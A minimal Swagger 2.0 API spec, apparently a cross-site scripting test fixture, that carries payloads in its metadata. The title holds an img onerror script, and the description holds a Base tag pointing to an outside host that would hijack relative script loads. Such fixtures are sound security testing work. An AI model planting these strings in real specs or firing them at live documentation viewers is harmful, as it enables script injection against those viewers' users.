swagger: '2.0'
info:
  title: XSS test'"><img src=x onerror=alert(document.domain)>
  description: |
    1'"</Script><Base id=18530 Href=//X55.is>
paths:
  /test:
    get:
      summary: test
      responses:
        '200':
          description: OK
